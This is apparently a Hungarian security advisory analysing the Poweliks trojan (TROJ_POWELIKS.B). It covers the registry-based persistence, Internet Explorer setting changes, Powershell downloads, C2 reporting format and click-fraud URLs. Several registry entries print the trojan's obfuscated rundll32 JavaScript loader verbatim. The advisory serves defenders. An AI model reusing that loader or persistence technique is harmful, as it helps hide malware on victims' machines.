TROJ_POWELIKS.B


2014. november 21. 09:23

CH azonosító

CH-11816

Angol cím

TROJ_POWELIKS.B

Felfedezés dátuma

2014.11.18.

Súlyosság

Alacsony

Érintett rendszerek

Microsoft

Érintett verziók

Windows

Összefoglaló

Ez a kártékony kód újfajta automatikus indítási mechanizmust használ és eltávolítja a felhasználó regisztrációs bejegyzés olvasási jogát. Ezek után a felhasználók nem képesek detektálni azt, hogy a rendszerük fertőzött-e.

A trójai egy másik malware vagy egy káros kódot terjesztő weboldal segítségével kerül a számítógépre.

Alias-ok: Trojan:Win32/Powessere.A (Microsoft), Trojan.Win32.Crypt.cya (Kaspersky)

Leírás

A trójai az alábbi regisztrációs bejegyzéseket hozza létre annak érdekében, hogy minden rendszerindításnál futhasson:

  • HKEY_CLASSES_ROOTCLSID{GUID}
    LocalServer32
    a = “{encoded script}”
  • HKEY_LOCAL_MACHINESOFTWAREClasses
    CLSID{GUID}LocalServer32
    a = “{encoded script}”
  • HKEY_LOCAL_MACHINESOFTWAREClasses
    CLSID{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}LocalServer32
    (Default) = “rundll32.exe javascript:”..mshtml,RunHTMLApplication “;eval(“epdvnfou/xsjuf
    (=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe
    (ILDS]]dmtje]]|84f81:fb.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmtfswfs43]]b(*,(=0tdsjqu
    (*”.replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))”
  • HKEY_CLASSES_ROOTCLSID{GUID}
    LocalServer32
    (Default) = “rundll32.exe javascript:”..mshtml,RunHTMLApplication “;eval(“epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDS]]dmtje]]|84f81:fb.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*”.replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))”

Az alábbi regisztrációs bejegyzéseket hozza létre még:

  • HKEY_CURRENT_USERSoftwareMicrosoft
    Internet ExplorerMain
    noprotectedmodebanner = “1”
  • HKEY_CURRENT_USERSoftwareMicrosoft
    Internet ExplorerMainfeaturecontrol
    feature_browser_emulation
    dllhost.exe = “dword:00002af8” 
  • HKEY_CURRENT_USERSoftwareMicrosoft
    Internet ExplorerMainfeaturecontrol
    feature_browser_emulation
    iexplore.exe = “dword:00002af8”
  • HKEY_CURRENT_USERSoftwareMicrosoft
    Internet Explorerlowregistrydontshowmethisdialogagain
    displaytrustalertdlg = “0”
  • HKEY_CURRENT_USERSoftwareMicrosoft
    Internet Explorer
    autosearch = “0”
  • HKEY_CURRENT_USERSoftwareMicrosoft
    Internet Explorersmartdithering = “0”

Az alábbi bejegyzéseket változtatja meg:

  • HKEY_CLASSES_ROOTCLSID{GUID}
    LocalServer32
    (Default) = “rundll32.exe javascript:”..mshtml,RunHTMLApplication “;eval(“epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDS]]dmtje]]|84f81:fb.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*”.replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))”
  • HKEY_LOCAL_MACHINESOFTWAREClasses
    CLSID{GUID}LocalServer32
    (Default) = “rundll32.exe javascript:”..mshtml,RunHTMLApplication “;eval(“epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDS]]dmtje]]|84f81:fb.6e:4.5c3f.ccc1.::c8:49eb:f5~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*”.replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))”

A trójai az alábbi weboldalakhoz próbál hozzáférni, majd letölt egy Windows Powershell-t az operációs rendszer verziójától függően:

  • hxxp://download.microsoft.com/download/3/C/8/3C8CF51E-1D9D-4DAA-AAEA-5C48D1CD055C/Windows6.0-KB968930-x64.msu
  • hxxp://download.microsoft.com/download/A/7/5/A75BC017-63CE-47D6-8FA4-AFB5C21BAC54/Windows6.0-KB968930-x86.msu
  • hxxp://download.microsoft.com/download/B/D/9/BD9BB1FF-6609-4B10-9334-6D0C58066AA7/WindowsServer2003-KB968930-x64-ENG.exe
  • hxxp://download.microsoft.com/download/9/8/6/98610406-c2b7-45a4-bdc3-9db1b1c5f7e2/NetFx20SP1_x64.exe
  • hxxp://download.microsoft.com/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe
  • hxxp://download.microsoft.com/download/0/8/c/08c19fa4-4c4f-4ffb-9d6c-150906578c9e/NetFx20SP1_x86.exe

Az alábbi neveken próbálja menteni a letöltött állományokat:

  • %User Temp%WindowsServer2003-KB968930-x64-ENG.exe
  • %User Temp%NetFx20SP1_x86.exe
  • %User Temp%NetFx20SP1_x64.exe
  • %User Temp%WindowsServer2003-KB968930-x64-ENG.exe
  • %User Temp%Windows6.0-KB968930-x86.msu
  • %User Temp%Windows6.0-KB968930-x64.msu

A trójai az alábbi adatokat szerzi meg:

  • Operációs rendszer és architektúra
  • UUID
  • Malware verzió
  • Készítés dátuma

A trójai a Windows Powershell-t használja, hogy végrehajtsa a beágyazott TROJ_POWELIKS.B-t egy scriptben, ami a registrybe íródik. Ez szolgál majd a malware automatikus indítási mechanizmusához.

Az alábbi URL-ek felé jelenti a fertőzés státuszát és a rendszerinformációkat:

  • http://{BLOCKED}f.com/q
  • http://{BLOCKED}1.com/q

Ezek után konfigurációs adatokat kap weboldalakról és keresési kulcsszavakról, melyeket kattintásos csalásokhoz (click-fraud activity) használnak.

Az információt az alábbi formátumban kapja:

type={status: start, install, exist, cmd or low}&version=1.0&aid={id}&builddate={build date}&id={iuuid}&os={OS version}_{OS architecture}

Jelenleg az alábbi URL-ekhez fér hozzá, hogy kattintásos csalásokat hajtson végre:

  • http://{BLOCKED}dablesearch.com/search.php?q=testosterone+cypionate
  • http://{BLOCKED}{BLOCKED}.143.90/click.php?c=3a293fcf1ec6d783daa5c0e6c98d5430b96906d3e2e27b9b3fae5f20571b2658f6b531abd729c60eedf9349158cf3ce9717e725a2b8bd205b900441f6f12563a38aef92db6a51224f2fa03bbda513887
  • http://{BLOCKED}orcefinder.com/search.php?q=medical+symptoms+checker
  • http://{BLOCKED}.{BLOCKED}.63.56/feed4/click?aff=10178&saff=448&cid=6d1c6c3d4cafb4d311016358b76c5d90
  • http://{BLOCKED}dablesearch.com/search.php?q=fast+weight+loss
  • http://{BLOCKED}.{BLOCKED}.143.90/click.php?c=3a293fcf1ec6d783daa5c0e6c98d5430fa1c105d8c90f5b9351517ea603fe076173ec310cbc666c1c8cb239c0cf3db97a832418dda941e8e25222883b6af4256f6061f198366c1de99463995ad7a19ac
  • http://{BLOCKED}dablesearch.com/search.php?q=joint+infection
  • http://{BLOCKED}.{BLOCKED}.241.85/click?sid=8f75f821c687855c53899112090ed27514c749fd&cid=0
  • http://{BLOCKED}dablesearch.com/search.php?q=testosterone+therapy
  • http://{BLOCKED}.{BLOCKED}.241.85/click?sid=7434e7992049245727327b488788b25379aeb75f&cid=0
  • http://{BLOCKED}dablesearch.com/search.php?q=knee+pain+when+bending
  • http://{BLOCKED}.{BLOCKED}.241.85/click?sid=6a0d85c48946f3bd0d1925d87c101f406280d4dc&cid=0

Támadás típusa

Information disclosure (Információ/adat szivárgás)
Other (Egyéb)

Hatás

Loss of confidentiality (Bizalmasság elvesztése)
Loss of integrity (Sértetlenség elvesztése)

Szükséges hozzáférés

Remote/Network (Távoli/hálózat)

Hivatkozások

Gyártói referencia: www.trendmicro.com

Legfrissebb sérülékenységek
CVE-2018-14933 – NUUO NVRmini Devices OS Command Injection sebezhetősége
CVE-2019-11001 – Reolink Multiple IP Cameras OS Command Injection sebezhetősége
CVE-2021-40407 – Reolink RLC-410W IP Camera OS Command Injection sebezhetősége
CVE-2024-20767 – Adobe ColdFusion Improper Access Control sebezhetősége
CVE-2024-55956 – Cleo Multiple Products Unauthenticated File Upload sebezhetősége
CVE-2024-50623 – Cleo Multiple Products Unrestricted File Upload sebezhetősége
CVE-2024-49138 – Windows Common Log File System Driver Elevation of Privilege sebezhetősége
CVE-2024-11639 – Ivanti CSA sérülékenysége
CVE-2024-42449 – Veeam Service Provider Console sérülékenysége
CVE-2024-42448 – Veeam Service Provider Console sérülékenysége
Tovább a sérülékenységekhez »